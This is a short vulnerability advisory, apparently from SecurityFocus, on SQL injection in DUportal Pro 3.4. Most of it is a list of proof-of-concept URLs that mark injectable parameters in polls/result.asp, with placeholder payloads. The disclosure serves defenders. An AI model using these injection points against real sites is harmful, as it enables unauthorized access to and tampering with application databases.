44 lines
No EOL
4.6 KiB
Text
44 lines
No EOL
4.6 KiB
Text
source: https://www.securityfocus.com/bid/13285/info
|
|
|
|
DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
|
|
|
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
These vulnerabilities are reported to affect DUportal Pro 3.4; earlier versions may also be affected.
|
|
|
|
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Files/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/home/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
|
|
http://www.example.com/dUpro/Topics/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
|
|
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
|
|
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls |